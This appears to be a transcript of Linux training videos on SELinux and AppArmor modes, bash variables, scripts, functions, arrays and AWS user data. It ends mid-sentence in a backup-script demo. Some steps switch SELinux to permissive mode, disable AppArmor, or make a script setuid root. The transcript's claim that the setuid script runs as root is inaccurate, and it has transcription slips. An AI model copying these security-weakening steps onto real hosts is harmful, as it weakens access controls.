just run sudo set enforce 0 and then get enforce, so it should return permissive mode, so that when we refresh our web browser, it's showing the sample web page. But what will happen if we switch SELinux to enforcing mode? Let's find out. So back here in Linux, sudo set enforce 1, we'll do a get enforce. Now we're in enforcing mode. Let's go back to the browser. And when we do a refresh, it now says forbidden, you don't have permission to access this resource. Really, the Apache web server doesn't have permission to access that resource to load up our index.html. The reason for this, if we change directory into /mysite and do an ls-z, is because the file types here are set to default _t. They don't match httpd something t. So let's do an ls-Z of whatever's in the mysite directory, which is our index.html. So let's do an ls-Z of the mysite directory. There's the index.html, but notice the type, default _t. Well, when we're in enforcing mode, whatever process needs to talk to that, there's got to be some kind of a matchup, and there's not here. That's not an httpd file type. So the way we solve this is by running sudo chcon. That means change context. I'm going to use the standard context type used for Apache web files, which is system_u :object_r for the role, httpd underscore sys underscore content underscore t, and then colon S0 for the permission class. It's least restrictive. We have to tell it the subject. Here, it's going to be /mysite. Don't make the mistake here of only pointing to the index.html or something like that, because while the Apache server technically would be able to see the file, it wouldn't be able to get into the subdirectory where the file exists. So once we've done that, there is now going to be a matchup between the Apache process, which we viewed with the ps command earlier, which is a type of httpd underscore t, and now files that it has to serve up, and directories, httpd underscore sys underscore content underscore t. Why don't we just go back to the browser and refresh our page? Oh, before we do that, let's just make sure we know what mode we're in. Okay, so we are in enforcing mode, which is how we want to test this. Okay, and just like that, it is now working. Now the Apache process is allowed, according to SELinux, to talk to our /mysite directory to serve up the content there in our custom web server directory. In this demonstration, we're going to take a look at AppArmor. Some distributions of Linux, notably names like SUSE Linux, Ubuntu Linux, use AppArmor, which is similar to SELinux in concept, in the sense that it's a mandatory access control or a MAC type of solution. So it is an actual kernel security module. Its purpose, kind of like SELinux, is to limit the capabilities of processes, such as to which files they can access in the file system, as an example. On Ubuntu Linux, which should have AppArmor installed automatically, you should be able to run sudo AppArmor underscore status. Notice that armor is spelled A-R-M-O-R. When I press enter, what I'm getting a list of are numerous profiles that are loaded to control the behavior of processes in regards to AppArmor. You'll notice too at the bottom of the output, it talks about complain mode. What is this? Well, just like SELinux can run in a number of modes, like permissive mode for monitoring versus enforcing mode to actually actively restrict things, AppArmor has two modes. The complain mode, and we see that referenced here, is kind of like permissive in SELinux. It's more of a monitoring and logging kind of mode. It doesn't actively restrict stuff. But the other mode that AppArmor has is called enforcement. Of course, that's very much like SELinux enforcing mode. So it's telling us we've got 0 profiles that are in complain mode, 2 processes with profiles defined, 2 processes are in enforce mode, and they're shown here. It's referencing crony-d. You might recall that crony-d is related to working with the network time protocol, or NTP, basically network synchronization between hosts. However, in a highly secure environment, what you might choose to do is put all of the profiles into enforce mode. You can do that with sudo AA, that's AppArmor, -enforce. And what you would do then is refer to /etc/AppArmor.d/ and you would just put in an asterisk to reference all of the files, all the profiles in that location. Now, if you get command not found, like I did, you probably need to run sudo apt install AppArmor-utils. Enter. It asks, do you want to continue? Of course, I'll type in Y for yes. And if we clear the screen and just use our up arrow key to go back to our AA-enforce command, this time it works. So notice it's got a bunch of references here to setting specific profiles to enforce mode, so that if we were to clear the screen and run sudo AppArmor_status once again, up at the top it talks about 30 profiles being loaded and 30 profiles being in enforce mode. Now, normally, before you go into enforce mode, you'll often configure things in complain mode and watch the activity for a while, just to make sure that there aren't incompatibilities or that you won't break anything when you're in such a restrictive state. So as you might imagine, I could run sudo AA-complain instead of enforce, reference the profiles. I'm just referencing all of them with the asterisk in the AppArmor.d directory. And if we clear the screen, and if we check the AppArmor status once again, what we're going to notice, you scroll back up at the top, we've got 30 profiles loaded, but now only 15 are in enforce mode and 15 are in complain mode. Of course, the individual profiles are actually shown. So I'm going to change directory to /etc/AppArmor.d. Clear the screen. Let's do an ls. Let's say we just want to make sure that user sbin TCP dump is in enforce mode and not complain mode. What we could do is run sudo AA-enforce, and then refer to the profile. So /etc/app armor.d/ and then I refer to that file name. And then it returns that it has set that item to enforce mode. So let's take a look at it. sudo nano, and we'll refer to that file name. You normally wouldn't change a lot of these defaults, at least not very often. It can get quite involved. You normally wouldn't change a lot of these settings. The defaults are usually sufficient, but you can. It can get quite involved. But the reason that we're going in here is just to point out that if you wanted to use AppArmor to protect your Linux hosts and you've got custom apps, then you would have to generate a custom profile for that application for it to run correctly when AppArmor is enabled. However, if you don't want AppArmor to start automatically, because it is a kernel security module, you could run sudo systemctl disable AppArmor. And at this point, upon reboot, AppArmor will no longer be active. All right, in this demo, we're going to take a look at Linux environment and shell script variables. Now, we've taken a quick peek at this already, but we're going to kind of review that and add a few extra things. So the first thing we'll do here in Linux is type in env, which stands for environment. And this returns, of course, a list of all of our environment variable names. And after the equal sign, we have the value stored within that environment variable. For example, we've got the user environment variable, which contains a value of whoever I'm logged in as, which right now is C. Blackwell. And of course, the path variable, which is very important, and all of its constituents. Notice that each part or each entry in the overall path variable is separated with a full colon. If we want to display back the contents of a variable, we can use echo with a $sign and then the name of the variable. Now, if I type in echo space $user in lowercase letters, we get nothing. And the reason for this is because when you reference variable names, as you might guess, it is case sensitive. So if we echo back $user, where user is in uppercase letters, well, then it works. It returns back our current username of C. Blackwell in the same way that echo $path, where path is in uppercase letters, works fine, but in lowercase letters, we get 0. Okay, so that's important to start with. We know that we can initialize variables at the command line, or within a script for that matter, simply by typing it in, such as city equals, and in double quotes, I'll put in Zurich. So we've created a city variable that will only exist while this current shell session is active, and the city variable was defined in lowercase letters and it contains a text string of Zurich. If we echo back $city, we get Zurich returned back. Now, depending on the type of shell you're using, whether it's a corn shell, a C shell, a bash shell, will really determine exactly what the syntax is to work with variables. Here for user C. Blackwell, if I were to cat/etc/password and grep it for C. Blackwell, notice that the shell that is used when that user signs in, which is what I'm doing right now already, is /bin/bash. So we're focusing on how a bash shell handles these variables. Now let's say I want to store the current date in a variable. Now if I just run date, it returns the date and time. So I want all of that stored in a variable at the time that the command executes. If I were to create a variable, let's say called current date, and if I were to say equals date, when we echo back current date, it returns back the text string date. Okay, so it literally interprets that as being the value. What we can do instead is go back up to our declaration of current date equals, and we can enclose whatever the command is, in this case date, within backticks. This is usually your tilde key on your keyboard in the upper left of your keyboard on at least a US layout. Those are not single quotes. Now you can add command line parameters and get as complex as you want to. Here we'll keep it simple. The difference now is that when we echo back $current date, it returns back the date and time which reflect when that was written into the current date variable. It doesn't have to be dates or times. It could be any valid Linux command or running of a script or doing anything. But it's important to know how to do this, both at the command line and certainly for writing scripts. If I were to type in set and pipe that to more, the set command will show me all of my variables, including my user-defined variables. So not only will it show the standard environment variables like path and user, but it will also show function declarations, which we can call upon here in the shell, and also our user-defined variables here. I'll press Q to quit out of that. Now let's create a variable here called
script var equals, and let's just have it say hello world. So at the command line here, if we echo $script var, it returns hello world. I've got a script here already created called export underscore var underscore script.sh. In it, I've got my shebang line at the top where I'm instructing Linux to use bin bash to run the rest of the script. I'm clearing the screen. I'm echoing back script var, which we just declared at the command line, and then just echoing back a blank line. So let's think about what's happening here. We've got a variable whose value is assigned outside of this script, and then when the script is running, we are calling upon it. What will the result be? Well, again, if we echo $script var, here it is, hello world. Let's just do it sudo chmod and add read and execute for our script. Let's run our script with / and then we'll refer to the name of it. We get nothing. Well, how can we get nothing? Because the default nature of working with variables in bash is that they only exist in the scope where they are declared. What we can do then, either when we are initially creating the variable or after the fact, in this case after the fact, is we can export the variable. If I export the variable, so export script var, okay, well, apparently it did something. Let's just echo script var here to make sure it works at the bash shell. It does. There's hello world. Let's go back up and run our script yet again. This time it works. And you might recall, if we nano back into that script, we are not declaring the value of the script var variable within this script. It's been declared outside of it. Now, this can be important in this type of situation, but also it's important when you have one script calling another script, which might in turn call yet another script. Exporting variables makes those variable values visible in child instances of shells. And so that can be very important in some cases. Now, the other thing we have to think about are exit codes whenever we run a Linux command or whenever we run a script or commands within a script. For example, let's say I run the hostname command. Okay, well, it worked and it returned whatever the hostname is of this machine. If I were to echo $? This will return the exit code of the most recent command that was executed. Notice that it's returning 0. 0 is good. When you get an exit code of 0 for any command, it means that it executed correctly. If I were to enter a non-existent command, let's say the host name, it says command not found. If we echo back $? We get a non-zero value. It returns 127. Why is that important? Well, because this is a way, maybe within a script, with an if statement or a case statement or something like that, we can test whether something was successful or not. So 127 in a bash shell environment specifically means that a command is not found. So whether you're at the command line or in a script, you can echo back the value of $? To test the return value of the last command that executed and take appropriate action. We're going to take a few minutes in this demo to focus on writing and running a simple shell script. Now, the first consideration is, what is it that you need that shell script to do? Shell scripts are used for automation. You can just lump a bunch of commands within a shell script file, or more than one, and then invoke the name of the shell script and it runs all the commands in it. You might even schedule it with cron. So once you've determined what you need the script to do, the second thing is to determine the shell that it will use. I've already got a shell script created here, which I'm going to open up with the nano text editor. It's called script1.sh. You don't have to use the .sh file extension for shell scripts. It's done commonly, but it's certainly not a requirement for it to work properly. Within a shell script, the first line should always be what they call the shebang line. The shebang line starts with the pound symbol, followed by an exclamation mark, and then the full path to the shell binary. In this case, I'm telling it I want to go into /bin, where the bash binary is to start a bash shell. Now, even though it looks like this is a commented line because it starts with the pound symbol, it's actually used to determine which shell should be used to run the following commands. It can make the difference between your script running correctly versus not on numerous Linux hosts. If you don't put in the shebang line, it's just going to use the shell that's currently running, the default shell. So you definitely want to make sure you point it to a C shell, a corn shell, or for example here, a bash shell. It matters. Now, shell scripts can do millions of different things, and they can get very long and very complicated. Here we have just a very simple example. For readability, you could have every separate command on a separate line, but Also, if you really want to save space on the screen, you might also just put a semicolon between various separate Linux commands and put them on the same line like I've done here. So I'm clearing the screen, and I'm using the let keyword to initialize a variable called total size to a value of 0. I'm also using the let keyword to initialize a variable that I'm calling current size to an initial value of 0. Then I've got a for loop. What I'm doing is looping through a subdirectory in the current location. You could hard code the full path here, but I haven't. I'm looking in web files for any files that end with .htm, because what I'm looking to do here is to gather the size of only the HTML files and then display the total size. Now, of course, there are other ways to do this in Linux already. This is just an example. So I'm using a for loop. For I is the name of my placeholder variable. I can use any name that I choose. So for I in web files /*.htm, and we know that with the for loop, whatever you want to execute each pass through the loop needs to be contained within the do done block. So what I'm doing first is I'm resetting the current size variable to equal the return result of the command here that I've placed within backticks. ls-l, so long listing of $i. First time through the loop, $i is going to point to the first HTML file in the web files folder. What I'm doing is piping that to the translate command, and I'm using -s to squeeze together spaces. Basically, if I've got one space between different pieces of information, sometimes maybe 2 spaces, 3 more, I just want a consistent 1 space between each field or each column. Because then when I pipe it to cut, I can easily determine what field number 5 is, -f5, where the delimiter, $d, is just a space. Field 5 contains the size of the file, and that's what I'm trying to stuff into the current size variable for the current HTML file we're processing as part of this for loop. Next, I am letting the total size variable equal whatever it currently is as a value, so $total size, plus I'm adding to it the value in the current size variable. This way, each time through the loop, the total size variable is being increased by whatever the size of the current HTML file happens to be. Once the loop is completed, so once we've processed all of the HTML files in the listed directory, then we have an echo statement that will say the total space used is, and then we'll display what's in our $total size variable, followed by the word bytes. That's being piped to T, because not only do we want that echoed on the screen, but we also want it echoed to a file in the current directory that we're going to create called html_file_results.txt. So again, a shell script can do millions upon millions of things. This is just an example for us to focus on. So I'm going to get out of here. The other thing that you need to make sure that you do is run change mode against the file to make sure that the appropriate parties have read and execute. So if I want everyone to have read and execute, so the owning user, the owning group, and everyone else, I could say +rx for read and execute, and then, of course, give it the name of the file in question, script1.sh. If I do a long listing of script1.sh, the text is green here in Ubuntu Linux at least, which implies it is executable. And notice the presence of read and execute for the owning user, the owning group, and of course for everybody else. Now, because the current directory is not in my path variable, to run the script, I could either use the full path to it, or because it's in the current directory, // and then the name of it. And if we press enter, it runs the script and says the total space used is 39 bytes. If I actually do an ls of web files, because I do have a subdirectory called web files here, otherwise the script wouldn't work, it contains 3 files, actually. Let's do a long listing of web files. There's file 1, file 2, and file 3. So what it's done is tallied up the size, which is shown here in column 5. Column 1 is the permissions, column 2 is the hard link reference, column 3 is the owning user, column 4 is the owning group, and then of course we've got over here column 5 where the numeric values are. So we now have a general sense of how to work with a shell script and how to think about which binary will be used to process the commands in the script. In this demonstration, I will be deploying a script to an AWS virtual machine running Linux. Now, this is really interesting. So the cloud is very convenient in that it's very quick to deploy virtual machines running pretty much anything. We're just going to be running bare bones Ubuntu Linux. But the cool thing about this is as we are deploying the virtual machine, we can choose to have commands or an entire script execute, which you might do for post-deployment tasks like making sure package repositories are up to date or installing packages or modifying config files, whatever it is. Of course, you can also deploy scripts to virtual machines after the fact, but in this case, we'll be doing it during deployment, or what they call in AWS, the launching of a virtual machine. Here I've signed into the AWS Management Console as I already have an AWS account. In the search bar, I'm going to search for EC2 and click on it because EC2 is where I go when I want to work with virtual machine instances. We currently don't have any. If I go to the instances view on the left, notice in the upper right, this is for the North Virginia, US East region. We don't have any virtual machines. Now, if I were to click on US West Oregon, I might get some virtual machines shown there if some were deployed in that region. There are none. So the first thing I would consider is where I want this virtual machine deployed. I want it deployed in US East, and I'm going to click the Launch Instance button. I want to call this Ubuntu 3, and down below, I can specify the OS image. Now, I can also search through the catalog because instead of just bare bones Linux, maybe I want Linux with Docker pre-installed or with Squid pre-installed or an entire LAMP stack. LAMP stands for Linux, Apache, MySQL, and PHP or Python. Maybe you want all that stuff pre-installed. In this case, I just want standard Ubuntu Linux. So I'm going to select Ubuntu down below. It then tells me that that's Ubuntu Server 22.04. That's fine. It's going to be 64-bit. The instance type here in the AWS cloud is very important because it determines the underlying horsepower. So when you think about what kind of workloads that this virtual machine will accommodate, you need to think about how much CPU power it will need, how much RAM or memory. So you can adjust the instance type. As you might guess, in the cloud, if you choose a much more powerful instance type to run your virtual machine, you'll be paying more for every minute it's running. In AWS, we also have to specify a key pair, which is used to authenticate to the virtual machine. The private part of that key pair you would store locally on your admin station, and the public key is stored with the VM in the AWS cloud. But you need the private part of that key pair to authenticate. Down below, we've also got network settings for the virtual machine. We could specify a security group to control what traffic is allowed or not allowed to the virtual machine. It's defaulted, because it's Linux, to allow SSH traffic from anywhere. But of course, you could change that. For example, I'll choose my IP as it's currently seen out on the internet. That would be the IP of the machine I'm sitting at right now actually doing this. We could always change that after the fact. We can configure the storage for the virtual machine. But what we've not yet seen is where we specify a script or commands to be run. That's because it's down under advanced details. So I need to drill down into advanced details to see it. So let's do that. Let's scroll down. What I'm interested in here, all the way towards the bottom, is the user data field. So I can choose a file. I can upload a file that might already have script commands in it, or I can type them in here. So I'll choose to type them in here. So perhaps after this virtual machine is deployed, I want to run an sudo apt update to update package repositories, and then I want to install Apache 2, install Docker IO for running containerized apps, and then maybe I'll write to the system log using the logger command, and it'll say test message from AWS ... Okay, so let's go ahead and click the launch instance in the bottom right, and then what we'll do is we'll SSH into it afterwards to make sure that these things that we've specified in the user data field have actually executed. Launch instance. Okay, it has successfully launched. I have a link with the unique ID assigned to that instance, which I can click on. Here in the properties of the instance, there's a public IP address, which I will copy. Now, when you deploy that in the cloud, if it didn't automatically assign a public IP, it's no big deal. You can just go over here on the left under Network and Security. You can go to Elastic IPs. You can allocate an IP, then select it and associate it with your virtual machine. But either way, I now have the IP that I can use in PuTTY to make a connection. Here in PuTTY, I've created an entry called AWS Ubuntu 3, and I've pasted in the public IP, but I need to specify my private key portion over here on the left under Connection. I'll go into SSH auth, where I'll then select the private key file for my key pair. And then I'll go back to session and save that, and I'll click Open. Because it's the first time I'm connecting over SSH, it asks if I trust the unique fingerprint of the server. I do. I'll choose Accept. The default username is set to Ubuntu. And because I had the private key and the related public key stored server-side through public key authentication, I am now in. So now that I'm signed into my AWS Ubuntu Linux instance, if I were to run, for example, sudo service Apache 2 status, of course it's up and running. It was installed as part of our script. If I were to run sudo, let's say cat of /var/log/syslog, And if we grep, well, why don't we just grep AWS? That was part of what we coded in to our user data. There's the test message from AWS. And when you're working with instances in Amazon Web Services, if you were to select it or be in the properties of it, doesn't matter. Either way, if you go to Actions, Instance Settings, you'll be able to scroll down and choose Edit User Data. You won't actually be able to edit it if the instance is running, but this at least lets you see what was set to occur. The default behavior is that it only runs this once when you initially launch your virtual machine. Let's talk about how to parameterize a shell script. Parameterizing means that we want to write our script so that, as opposed to simply calling it by name at the command line, we can pass command line parameters and values to alter the behavior of the script. As you might guess, the script has to be written to accommodate this fact, but that's exactly what we're going to take a look at right now. I'm going to begin by using Nano to open up a script I already have here called script2.sh. This is our first basic example. So the first line of the script, as it always should be, is the shebang line pointing to the shell interpreter. In this case, !bin/bash. Next in my script, I'm simply clearing the screen and using echo to provide a blank line. Then I'm echoing back some literal text in double quotes that says, this script is called, and after the closing double quote, I've got a space, and I've got $0. Well, I know that variable names are usually prefixed with a $sign when you want to extract their values. What's this? $0 simply evaluates to the name of the script, in this case, script2.sh. I've then got another blank echo line and then another echo statement that says the value of parameter 1 is, and outside of those double quotes, I've got a space and $1. Well, if $0 is the script name that was specified on the command line, the next thing that might have been specified is a parameter, parameter 1. That's what $1 is. And we've done the same type of thing to extract the second command line parameter, $2. Now, of course, in this script, we aren't checking to see if anything's missing or anything extravagant like that. We're keeping it simple. Let's just test out this construct. So, Control X out of that. As always, change mode and make sure the appropriate parties have read and execute to the script. And then if we just call /, in this case, script2.sh, so it says this script is called, and then it's got / script2.sh. That's the $0. But notice that we didn't specify any further command line options. And so for the other statements showing the value of parameter 1, the value of parameter 2, there's nothing after the literal text. However, let's say we ran / script2.sh, and let's say I'll put in a parameter I'm calling John. No dash, just the text John. Well, then when I run the script, it clears the screen, $0, the name of the script is returned, and parameter 1's value, which we specified on the command line as John, is now shown. Well, I see how this works. So if I put doe as the next parameter, it returns those items. All we're proving thus far is that, okay, I can capture what's passed on the command line in my script. What you do with it from there is entirely up to you. Do an if statement, do a case statement, take some kind of action, call a function. Who knows? It could be anything. But I'd like to take a look at a little bit more of a complex example. So let's nano script3.sh. So as usual, I've got the shebang line at the top, but after that line, I've got a while statement. So I've got a loop. After while, I have getOps, as in GETOPTS. And in quotes, I'm specifying :H, :O, and close quote. In other words, while there were command line options passed on the command line. Now in this case, it means -H or -O. And what I'm doing is storing that information in an option variable. Now, there's a note here that I've added to my script that says the leading colon here in the double quotes after getOps will simply suppress any error messages if any unknown options are passed on the command line, like -X. Our script is coded right now to accept -H and -O. Now, this is a while loop. So after the condition, we've got a do-done block within which we've got to have our code, whatever logic it is that we want to execute. In this case, all that we're doing is using a case statement, which ends with ESAC. That's the ending part of that block, the word case backwards. And what I'm doing is I'm looking at the variable option. So case $, and in curly braces, I have the word option, then in. And the first thing I'm testing for is H. What does that mean? Well, that ties to up above here. What we're looking for on the command line after the script name is -h, kind of like when you're typing in some Linux commands and you put in a command line parameter. We're writing our script to accept -h. In my example, let's assume the nature of -h is that we want the name of a host to be supplied. After h space closing parentheses, I've got an echo statement that simply says supplied host name is, and the way that we use a placeholder built-in variable to grab the value after -h is we use $opt arg as an optional argument. That's an uppercase. Now, you know how a case statement works. At the end of each item, you've got a double colon, and then we're on to the next one. So when -o is passed on the command line, that's from up above, we're testing for that. And in the nature of this script, let's say that means operation. It says supplied operation is, and then it's going to return the value provided after -o. So how do we grab that item? We just use the exact same placeholder variable we did from above. $opt arg in uppercase letters. On the command line, whoever's running the script, if they use -h but don't provide a value for it, or -o and don't provide a value for it, then we've got our catch-all down here for that specific situation. Asterisk space close parentheses echo. You must supply values for specified parameters. And then, of course, at the end of that, 2 semicolons. Well, this is interesting. So we're going to test out running this script with -h, -o, with and without values to see what it does. Will it work? Well, there's only one way to find out. So again, change mode. Let's say I want everyone to have read and execute on script 3.sh. So if I just run /script 3.sh with no parameters, we get nothing. There's no error thrown or anything like that. Okay. What if I put -x as a command line parameter? Now, we didn't code -x in any way. Well, our catch-all kicks in. It says, well, you must supply values for specified parameters. Okay, well, what if I do host 1? We're getting the same thing. Now, we can get more extravagant with our error capturing, but let's test this out using, let's say, -h with nothing. You must supply values for specified parameters. Okay, how about host 1? All right, that worked. It says supplied host name is host 1. If we run script 3 and add to that previous command, -o for operation, let's say I'll put in a value of ping. It now says the supplied host name is host 1 and the supplied operation is ping. Now, again, if you know how to capture this information within your script, you can take off and run with that and do whatever it is you need to do. Maybe actually ping that host or do whatever it is that the nature of the script calls for. What's important is to have a sense of how we can check to see what was passed as command line parameters on the command line when calling a script. In this demo, we're going to be working with array variables. So when it comes to working in a Linux shell or also within a script, we know that a variable is a storage location in memory that can store a value, whether it's numeric or date and time, string, whatever the case might be. Well, an array variable means that we have a collection of the same types of items. For example, if we want to store cost center codes, so a multitude of them, we can store them not in separate variables, but within an array variable, which would contain all of them, each stored in a different element, starting with numbering at 0. First element in an array is item 0, the next is number 1, and so on. Let's see how this works syntactically in a bash shell here in Linux. The first thing I'm going to do is I'm going to create an array variable right at the command line. Let's say I want to store colors in an array variable. So colors. Now, remember that arrays start counting at 0. That's the first element or the first item in the array. They start at 0. So I can use the square bracket notation and put in the array subscript number or the element number, in this case 0, and to set its value, I would simply say equals, and then determine whatever it is I want to be stored in that variable. Let's say red, surrounded by double quotes. I'll use the up arrow key to bring that up again because then I can populate the next element in the array, let's say with the color of blue. That would be colors and within square brackets 1. That's the second array element. Now that's how we can populate an array variable, at least individual elements in a variable at the command line. But what about displaying it back? Well, we know how to do that with variables. We know we have to use the echo command. We know that variables must be prefixed with a $sign when you want to display back their value. But this is where the notation will change a little bit with an array variable in the bash shell. You need to use an open curly brace, then refer to the name of the array variable, in this case colors. If I want to display back element 0, I would put that within square brackets, Then I would close with a curly brace. If I press enter, it returns red as expected. And of course, if I use the up arrow key to go back to that previous command, let's change the 0 to a 1. Of course, it's going to return blue. Okay, so we know how to manually populate array elements. We also know how to manually display them back. Now, with larger arrays with numerous elements, you're going to want to use some kind of a looping structure to loop through them. And we'll take a look at that shortly. And this isn't about memorizing syntax. As a Linux technician, many times you'll be working with existing scripts that might use this type of notation. So what's really important is being able to recognize what you're seeing for what it is. Being able to look at these kinds of statements and say, oh, that's an array, and oh, I understand what's happening. If you can memorize it, that's great too. But the key is having an understanding of what's happening. Let's further our knowledge here. If I were to type echo, $, open curly brace, colors, open square bracket, @ closing square bracket, closing curly brace. Now, what does that mean? When I press enter, it returns back all of the elements in the array at once. So it returns red and blue. What's interesting too is if I use the up arrow key once again to bring up that previous command, if I put a pound symbol, a hashtag symbol right in front of the name of the array, so right in front of colors, it's the only thing I've changed, and press enter, it returns the number of elements in the array. In this case, we've got two elements, item 0 and item 1. You could even do the following. I'll use the up arrow key to bring up that same command. All I will change is the @ symbol within the square brackets, let's say to 1. Now I still have the hashtag or the pound symbol in front of the name of the array. What this is going to do is count how many characters there are in element 1 within the colors array. Remember that that is the word blue, B-L-U-E, so of course that's 4 characters. Sometimes you will need to know these types of things. We can also replace values within an array. Here I'm using echo, $, open curly brace, colors, and within square brackets I have an @ symbol, which of course means all of the elements in the array. Then I have /blue /green closing curly brace. All that this means is within the colors array, I want to seek out blue and replace it with green. Enter. It returns back everything in the array, which now shows as red-green. If I actually use my up arrow key to go back in our history where we displayed the entire array, notice that it only did it for that echo command output. Red and blue are actually still stored in the array. And if you think about it, we didn't set the value of the array because we were just using the echo command. But of course, we know how we can manually change values within an array. I'm going to clear the screen and do an ls. I've got a sample file here called stockvalues.txt. If I cat stockvalues.txt, it's got 1, 2, 3, 4 items. They're numeric values. So what we're talking about is how do we populate an array from a file? There are numerous ways to do that. Probably the easiest way is to create your variable. So let's say stock values var equals, and in parentheses and within backticks, I would simply run cat stockvalues.txt, close the backtick, close the parentheses, enter. And we know how to display back an array variable. Echo, $, open curly brace, stock values var, and within square brackets after that, we have an @ symbol, close the curly brace, enter. So now we've loaded the contents of a file, or it could be the result of running some kind of a command in Linux, it could be anything, into an array. What I could also do is use a looping structure to go through each item. For example, for individual stock value, that's a long variable name, but I'm trying to be clear in what I'm demonstrating, in $ stock values var, and within square brackets, we've got an @ symbol. Of course, remember that when you're dealing with array variables, though, the whole thing for the variable name needs to be enclosed within open and closing curly braces. Okay, so I'm writing a for loop where my placeholder variable, as we loop through all of the stock values in the array, our placeholder variable will be individual stock value. Enter. I'm not finished the loop, of course. Now I'm going to type in do. All right, what do you want to do within the for loop? How about we simply echo back the individual stock value variable? So each time through the loop, it's going to point to the next element in the array variable. We type in done and enter. And notice that it looped through with our for loop construct each individual element or item within the array and returned it back because we referred to our placeholder variable, individual stock value. In this demo, we're going to focus on how to create a shell script function. Now, a function is a collection of commands or expressions that you want to be able to execute by invoking the name of the function. Well, doesn't that sound like the purpose of a shell script? Well, it's close to it, but the difference is that a shell script can contain numerous function definitions that you can call upon as required. Actually, you can also define a function just at the command prompt if you really want to. Imagine this. I'm going to create a function using the function keyword here in a bash shell. So I want to call the function general_details, open close parentheses. If you get more complex with your use of functions in Linux, you can create them so they accept arguments where you can pass values to the function, but here there are none, but I still have to put in the open close parentheses. Enter. Open curly brace. The definition of what your function does, and it could be anything, must exist within the open and closing curly brace. So we've got an open curly brace, enter. We'll make this simple. Let's say we just want to do clear. We want to run the hostname command and the ID command. I'm pressing enter after each of those, and then enter. And then on the last line, I close the function definition with a closing curly brace. We've just defined a function called general_details. Now the function won't exist when we end this shell session unless we put it in a startup file. However, to call that function, all I have to do on the command line is simply refer to the name of the function, general_details. I don't have to use the open and close parentheses. It worked. It cleared the screen, it returned the host name, and it ran the ID command, which shows the user I'm logged in as and all the group memberships. So the function worked. Now often, Linux techies will go ahead and create their own function definitions to serve their own specific needs within a shell script. You might even put it in a shell script that you call upon from other scripts when you want to use the function. So you don't have to keep copying the function definition into each shell script. You'd have them centralized, kind of like in shell script libraries containing functions that you call upon. But in this case, let's just go ahead and use the nano command. And we're going to open up an existing file I've already created called functiontest.sh. Of course, you can call the script whatever you want. It doesn't have to end with .sh. Now remember that the first line of every script should always be the shebang line. Point to the shell interpreter that you've written the script for, so it runs the commands correctly. And down below, I've defined a function called show_IP_info. So I've got the open and close parentheses. As we know, when you declare a function, you've got to have an open curly brace and a closing curly brace, and then you do whatever stuff is that you want to do within it. All I'm doing here is creating a variable called IP_var, which is going to use the ifconfig command, pipe that to grep, looking for the text inet, pipe that to translate, squeeze one or more spaces, and replace it with a colon, so we have a common delimiter, pipe that to cut, and field number 3 will be the IP address information where the delimiter, -d, is a colon. Now notice all of that is enclosed within backticks, because I want the result of that command stored in the IP_var variable. Right? I don't want to store the actual text of the command in the variable. That's not the point at all. We're doing the same type of thing for the next line. We're making a variable for the default gateway, dgw_var equals, and then in backticks, we have the appropriate command to extract the default gateway address. Then we're using the echo command to echo back the IP addresses and referring to our IP_var variable, of course with the $ prefix to show the value of that variable. Same with the default gateway. Then we're just catting etcresolve.conf and grepping for name server, and then piping it to grep again with -v to exclude any items that have a pound symbol or comment. So we want to show the DNS servers. That's just the definition of the function. Down below, we're then actually calling the function so it actually executes. You might call the function from somewhere else, depending on where the function was defined. But let's go ahead and run this script. Of course, you're going to have to make sure you run chmod against that and make sure that you add read and execute, let's say for everybody, and then you can run the script. /functiontest.sh, and it worked. It says IP addresses, it's giving me my IPs, including my, or at least part of my IPv6 address, my default gateway, name server. The point isn't really what the function is doing, because that could be a million different things. The point is the overall construct. So for anything that you'll be scripting that is repetitive in nature and is more than just 1 or 2 lines, you might consider building a function for it and then simply calling upon that function when you need those commands executed. And finally, the last thing I'll just mention here is that you can also export a function definition. If I run export-f, let's say our general details function, which you might recall we defined here at the command line. If I want that to be available, let's say within a script where it's not been defined, then exporting the function, just kind of like exporting variables, is required. Let's go back to using nano. I'm going to call this exported function.sh. All I'm going to do is refer to general_details. That's it. Close and save that file, run change mode against it, make sure read and execute is set, and // exported function.sh, and it worked. It returned back the host name, it ran the ID command, cleared the screen. So this is going to be important. The scope of functions and where they are visible and usable, kind of like variables, is an important concept to understand when you're working with scripting in Linux. One common use of Linux shell scripts is for technicians to create backup scripts. So in order to back up important files, whether it's user home directories, data directories, shared files, whatever the case might be, you can automate the backup by creating a script. You could invoke the script manually, or you might schedule it with cron, which we'll see in another demo. But let's focus on the backup script side of things now. Now, there are no rules as to how exactly this is done. It really depends on your specific need. Here in Linux, I'm going to run nano, and I'm going to open up a backup script I already have prepared. It's called backup.sh. Now notice here, down at the bottom, it says file backup.sh is unwritable. So what's going on here? Control X, let's do a long listing of backup.sh. What's been done here is the special user ID bit has been enabled. That's what the lowercase s implies here, that there's an X in there for execute. So the owner, which is root, has read, write, execute. And the lowercase s also means that whoever invokes this script, when they invoke it, it will run with the permissions of root. So the invoker of the script themselves might not have access to the locations that are being backed up in the file system, but root would. However, it also means that when I edit that script, I'm going to have to use sudo. I have to be in the sudoers file to be able to modify this particular script. You don't have to do that for a shell script. The only thing you really have to do is make sure read and execute is enabled for the appropriate people running the script. But if that script needs to talk to restricted file system locations, either you grant permissions to the people running the script to those locations, or you run the script as root by enabling the special user ID bit. By the way, before we do that, the way we would do that, set those permissions on that backup script file, we could use change mode. I could use 4755 and then the name of the file. The first 4 here, what that means is that we are setting the user ID bit. The group ID bit would have a value of 2, the sticky bit would have a value of 1, as you might recall. The 7 here means read, write, execute for the owner, root. The 5 means read and execute for the owning group, which here is C Blackwell. And the last 5 here is read and execute for everybody else. That's already been done. So let's go back to sudo nano, get into that backup script. So there's more than just actually writing the script then, isn't there? You have to consider the permissions, what the script is doing, what you're going to do to elevate those permissions. There are so many ways to do it. But that's the reality. It's more than just writing the syntax in the script. Now let's focus on that part of it. So the first line is a shebang line pointing to the shell interpreter. Got it. In this case, the bash shell. The way I've written this script, I've decided to use variables to put together the name of the backup file, so that the name of the backup file will include some date information. So I'm setting up some variables here. The day variable will equal, and then within backtick symbols, because I want the result of the command written to the variable, I have date plus, and in double quotes, %lowercase d, which will return the day part of the date only. I don't want the whole date. I just want the day stored in the day variable. And I've done the same type of thing for my year variable in terms of having the backticks, running the date command, and telling it what portion of the date I would like to extract. In this case, %Y will return just the year part of the date. I've done the same type of thing for month, where I'm referring to %lowercase m to extract just the month from the full date. And I've decided to create a function to do this. Of course, that means that I could call upon that function multiple times or whatever the case might be. So my function is called full_backup. And we know how a function is structured. We've got the open curly brace and the closing curly brace. You don't have to use a 